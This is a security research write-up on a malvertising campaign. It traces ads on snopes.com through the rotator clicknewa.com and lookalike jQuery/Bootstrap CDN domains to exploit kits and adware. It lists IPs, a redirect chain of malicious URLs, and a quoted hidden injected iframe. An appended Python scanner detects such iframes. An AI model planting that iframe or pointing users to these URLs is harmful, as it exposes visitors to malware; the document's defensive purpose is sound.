Abuse of ad networks to drive traffic to malware distribution servers is an established and commonplace attack tactic. We recently observed activity involving multiple popular websites where traffic from malicious ads and infected sites passed through a set of traffic distribution systems directing visitors to Nuclear Pack exploit kit and other malware distribution servers.

We began to see this activity on November 6 and can confirm redirections through today.

www.snopes.com

Earlier in the week, the urban legends website www.snopes.com was observed publishing ads that led to clicknewa.com (8.36.46.223). This site functions as a rotator, forwarding traffic to a set of websites including the following:

  • cdn17-jquery.com
  • jquery-cdn14.com
  • cdn12-bootstrap.com

Hosting IPs:

clicknewa.com           8.36.46.223
cdn17-jquery.com        5.61.36.2

5.61.36.2 AS16265 | NL | ripencc | 2001-02-12 | LEASEWEB-NETWORK LeaseWeb B.V.
8.36.46.223 AS30152 | US | arin | 2011-02-22 | BEYOND-HOSTING - Beyond Hosting, LLC

Related records:

cdn17-jquery.com.       IN  A  5.61.36.2
jquery-cdn14.com.       IN  A  5.61.36.2
cdn12-bootstrap.com.    IN  A  5.61.36.2
mobile-top-review.com.  IN  A  5.61.36.2

The origin of this traffic redirection on Snopes' site is through the ValueClick/Conversant ad network.

Snopes visitors have been affected by malicious ads distributing malware on more than one occasion. As recently as October, viewing content on www.snopes.com was found to result in redirection to the Angler exploit kit, with traffic originating from display ads on the site and passing through a number of intermediate systems.

The tactic of naming malicious sites after well-known frontend web toolkit brands is not new; it lets the domains pass casual inspection by some users, and we have seen the behavior before. One prominent example is the use of a fake jQuery CDN site to host a malicious redirector during the compromise of the jQuery project's sites earlier in the year.

More recent activity has also been observed with traffic directed from clicknewa.com to clickated.com. clickated.com has a history of malicious traffic redirection, including an incident from September in which the site passed traffic to the RIG exploit kit.

clickated.com           209.87.144.91

209.87.144.91 AS30152 | US | arin | 2011-02-22 | BEYOND-HOSTING - Beyond Hosting, LLC

Adware distribution

Other requests to the TDS domain clicknewa.com have been seen redirecting to additional malware distribution campaigns, including adware loaders that have recently been observed with high frequency.

http://clicknewa.com/view/qVpx2PvLu3l4B4IsiZQ5xsULpCznDnZhSalSMdKoN94YGWIY00?c=2379&pid=40&tid=
    302 text/html [no content]
http://www.yousoftjultimatedwn.com/wd9z1WG9/videoupdater/c/?ref=clicknewa.com&pid=40&tid=
    302 text/html 154B
http://www.08i8b4384.com/3659203E65716B5B28323E29277D28441FC2A816B4664BDA609DC660A058618A85AFD70BC4BF103CCC7D79F5A1B8EDCB?ref=clicknewa.com&tid=&slp=www.yousoftjultimatedwn.com&pid=40
    200 text/html 10.95kB
...
http://ttb.08i8b4384.com/download/request/545a00665f1c1e4737000006/wd9z1WG9?__tc=1415864973.938&lpsl=2cd430f7b18059ac136b570796d7bad0&expire=1415951370&ref=clicknewa.com&tid=&slp=www.yousoftjultimatedwn.com&pid=40&fileName=Setup_v2_1
    302 text/html [no content]
http://xddlhqyol.bo0v3029w.com/Jn0XULFcdO1P_hE1cQJ8Vky3XbDXBC_VBnCsD07uFlZsSJw2rAteimpKXlBtkRPmLAPTkJc8_5YH0Hv0IYUOLlZUqhUM-IpmIKoUYIy0KcddUQhd7_8du9HyLMvGpl0m
    200 application/octet-stream 732.86kB

Direct injection

Other sites show redirections to the same malicious infrastructure triggered not by malicious ad placement but by direct web content injection. As shown in this incident, the popular (Alexa top 10K) online game arcade site myonlinearcade.com is serving a malicious iframe injected into its site footer. This injection has been in place since at least November 7th.

On November 9th, we detected Nepalese news portal www.ekantipur.com serving malicious iframes as well:

https://sf.riskiq.net/bl/82574586/cd46d3d01a619e40?_sg=DYadsw%2F2hZyqTZyRVuhxwg%3D%3D

Similar malicious iframes were injected into their site content at the time of detection:

<iframe src="http://cdn17-jquery.com/ekantipur" style="width:100px;height:100px;position:absolute;left:-10000px;top:0;" width="100px" height="100px"/>
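The injected iframe above combines two traits a site owner can scan for: it is pushed far off-screen with a negative CSS offset, and it points at a host that borrows a CDN brand name (as with cdn17-jquery.com, jquery-cdn14.com and cdn12-bootstrap.com). The following scanner is an added example, not code from the original write-up; the sample markup is constructed from the iframe quoted above plus a benign iframe, and the allowlist of genuine CDN hosts is an assumption for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the injected iframe quoted in the write-up plus a
# benign embed, so the scanner has both a malicious and a clean case.
SAMPLE_HTML = """
<div id="footer">
<iframe src="http://cdn17-jquery.com/ekantipur" style="width:100px;height:100px;position:absolute;left:-10000px;top:0;" width="100px" height="100px"/>
<iframe src="https://www.youtube.com/embed/example" width="560" height="315"></iframe>
</div>
"""

# Brand words the rotator's domains imitated.
BRAND_WORDS = ("jquery", "bootstrap")
# Assumed allowlist: hosts that genuinely serve these libraries. Any other host
# carrying a brand word in its name is treated as a lookalike.
KNOWN_CDN_HOSTS = {"code.jquery.com", "cdn.jsdelivr.net",
                   "maxcdn.bootstrapcdn.com", "stackpath.bootstrapcdn.com"}

# Matches negative left/top offsets such as "left:-10000px".
OFFSCREEN_RE = re.compile(r"(?:left|top)\s*:\s*-(\d+)px", re.I)

def is_offscreen(style):
    """True if an inline style pushes the element at least 1000px off the viewport."""
    return any(int(px) >= 1000 for px in OFFSCREEN_RE.findall(style or ""))

def is_cdn_lookalike(host):
    """True if the host borrows a CDN brand word but is not a known CDN host."""
    host = (host or "").lower()
    return any(w in host for w in BRAND_WORDS) and host not in KNOWN_CDN_HOSTS

class IframeScanner(HTMLParser):
    """Collects (src, reasons) for every suspicious <iframe> in a document."""
    def __init__(self):
        super().__init__()
        self.findings = []

    # Self-closing <iframe .../> tags also reach this hook: HTMLParser's default
    # handle_startendtag calls handle_starttag.
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        host = urlparse(a.get("src") or "").hostname
        reasons = []
        if is_offscreen(a.get("style")):
            reasons.append("offscreen-positioning")
        if is_cdn_lookalike(host):
            reasons.append("cdn-lookalike-host")
        if reasons:
            self.findings.append((a.get("src"), reasons))

def scan(html):
    """Return the suspicious iframes found in an HTML string."""
    parser = IframeScanner()
    parser.feed(html)
    return parser.findings
```

Either trait alone is worth a look; an iframe that shows both, as the ekantipur injection does, is a strong signal for a footer or template compromise like the ones described above.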